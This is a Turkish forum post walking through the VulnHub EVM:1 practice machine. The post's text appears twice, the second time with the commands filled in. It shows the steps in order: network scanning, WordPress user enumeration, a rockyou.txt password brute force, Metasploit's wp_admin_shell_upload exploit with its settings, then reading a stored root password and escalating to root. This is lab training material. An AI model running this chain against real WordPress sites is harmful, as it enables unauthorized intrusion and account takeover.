Merhabalar TürkHackTeam ailesi, bugün sizlere EVM:1 VulnHub Zafiyetli Makinesinin çözümünü göstereceğim.
https://www.vulnhub.com/entry/evm-1,391/
Makine İsmi: EVM: 1
Yayınlanma Tarihi: 2 Kasım 2019
Yapımcı: Ic0de
Seri: EVM
Açıklama: Hedefte ki Flag.txt dosyasını bulmak ve root olmak
Dosya Boyutu: 780 MB
İşletim Sistemi: Linux
Zorluk Derecesi: Orta
Öncelikle hedefin IP adresini öğrenmek için netdiscover aracını kullanıyoruz. Terminale
yazalım.
IP adresini yakaladık.
Ardından NMAP taraması yaparak açık portlar hakkında bilgi toplayacağız. Terminale
yazalım ve açık portlara bakalım. SSH ve 80 portu açık yani bir site var.
Siteye gidelim ve içeriğe bakalım. İçerikten pek de bir şey çıkmadı sadece mesaj olarak /wordpress vermişler.
Siteyi kazımak için dirb aracını kullanıyoruz. Terminale
yazdık ve tamaya başladı. /wordpress dizinini buldu bizlere.
Siteyi açtım ve URL sonuna /wordpress ekledim. Bu şekilde bir arayüz karşıladı beni.
Wpscan ile daha fazla wordpress dizini ile ilgili bilgi toplayacağız. Terminale
yazarak taramayı başlatıyoruz. (ap : Tüm eklentileri
at : Tüm temaları
u : Oturum açmış bütün kullanıcıları listeler.)
Gördüğünüz gibi c0rrupt3d_brain isimli bir kullanıcıyı yakaladı.
Şimdi bu kullanıcı için kaba kuvvet saldırısı yapacağız bunun için de rockyou.txt dosyasını kullanacağız. Terminale
yazıyoruz.
Tarama sonucu şifremizi buluyor şifre: 24992499 olarak bulduk.
Exploit zamanı Terminale
yazalım.
yazalım bizlere siteye ilk girdiğimizde ipucu vermişti zaten.
Burada exploit/unix/webapp/wp_admin_shell_upload exploitini kullanacağız.
Direk kullanmak için
yazdım çünkü baş tarafından 105 id'si vardı. Ayarlarına bakmak için
yazalım.
Ayarları yapmak için
yazalım.
Ve içerideyiz.
home dizinine gitmek içni
ve içeride ki bilgileri görmek için
yazdık. İçeride root3r dizinini gördük ve içeri girmek için
ve bilgileri yazdırmak için
yazdık. İçeride ssh bağlantısının şifresi yazan bir dosya bulduk.
Bunu
ile yazdırdığımda da şifreyi yani willy26 olduğunu öğrendik.
Şimdi yetki yükseltme işlemi yapacağız. İlk olarak
yazarak yetki yükselttik. Şimdi
şifreye de willy26 yazalım. Ardından
yazarak işlemi bitirelim
[ame="https://www.youtube.com/watch?v=rfbr6uLQJRk"]https://www.youtube.com/watch?v=rfbr6uLQJRk[/ame]
Konum bu kadardı arkadaşlar, başka bir konumda görüşmek üzere sağlıcakla..
https://www.vulnhub.com/entry/evm-1,391/
Makine İsmi: EVM: 1
Yayınlanma Tarihi: 2 Kasım 2019
Yapımcı: Ic0de
Seri: EVM
Açıklama: Hedefte ki Flag.txt dosyasını bulmak ve root olmak
Dosya Boyutu: 780 MB
İşletim Sistemi: Linux
Zorluk Derecesi: Orta
Öncelikle hedefin IP adresini öğrenmek için netdiscover aracını kullanıyoruz. Terminale
Kod:
sudo netdiscover
IP adresini yakaladık.
Ardından NMAP taraması yaparak açık portlar hakkında bilgi toplayacağız. Terminale
Kod:
nmap -A 192.168.1.16
Siteye gidelim ve içeriğe bakalım. İçerikten pek de bir şey çıkmadı sadece mesaj olarak /wordpress vermişler.
Siteyi kazımak için dirb aracını kullanıyoruz. Terminale
Kod:
dirb http://192.168.1.16/
Siteyi açtım ve URL sonuna /wordpress ekledim. Bu şekilde bir arayüz karşıladı beni.
Wpscan ile daha fazla wordpress dizini ile ilgili bilgi toplayacağız. Terminale
Kod:
wpscan --url http://192.168.1.16/wordpress/ -e at -e ap -e u
at : Tüm temaları
u : Oturum açmış bütün kullanıcıları listeler.)
Gördüğünüz gibi c0rrupt3d_brain isimli bir kullanıcıyı yakaladı.
Şimdi bu kullanıcı için kaba kuvvet saldırısı yapacağız bunun için de rockyou.txt dosyasını kullanacağız. Terminale
Kod:
wpscan --url http://192.168.1.16/wordpress/ -U c0rrupt3d_brain -P rockyou.txt dosya yolu
Tarama sonucu şifremizi buluyor şifre: 24992499 olarak bulduk.
Exploit zamanı Terminale
Kod:
msfconsole
Kod:
search webapp
Burada exploit/unix/webapp/wp_admin_shell_upload exploitini kullanacağız.
Direk kullanmak için
Kod:
use 105
Kod:
show options
Ayarları yapmak için
Kod:
set RHOSTS 192.168.1.16
set TARGETURU /wordpress
set USERNAME c0rrupt3d_brain
set PASSWORD 24992499
exploit
Ve içerideyiz.
home dizinine gitmek içni
Kod:
cd /home
Kod:
ls
Kod:
cd root3r
Kod:
ls
Bunu
Kod:
cat .root_password_ssh.txt
Şimdi yetki yükseltme işlemi yapacağız. İlk olarak
Kod:
shell
python3 -c 'import pty;pty.spawn("/bin/bash")'
Kod:
su root
Kod:
cd /root
ls
cat proof.txt
[ame="https://www.youtube.com/watch?v=rfbr6uLQJRk"]https://www.youtube.com/watch?v=rfbr6uLQJRk[/ame]
Konum bu kadardı arkadaşlar, başka bir konumda görüşmek üzere sağlıcakla..
Son düzenleme: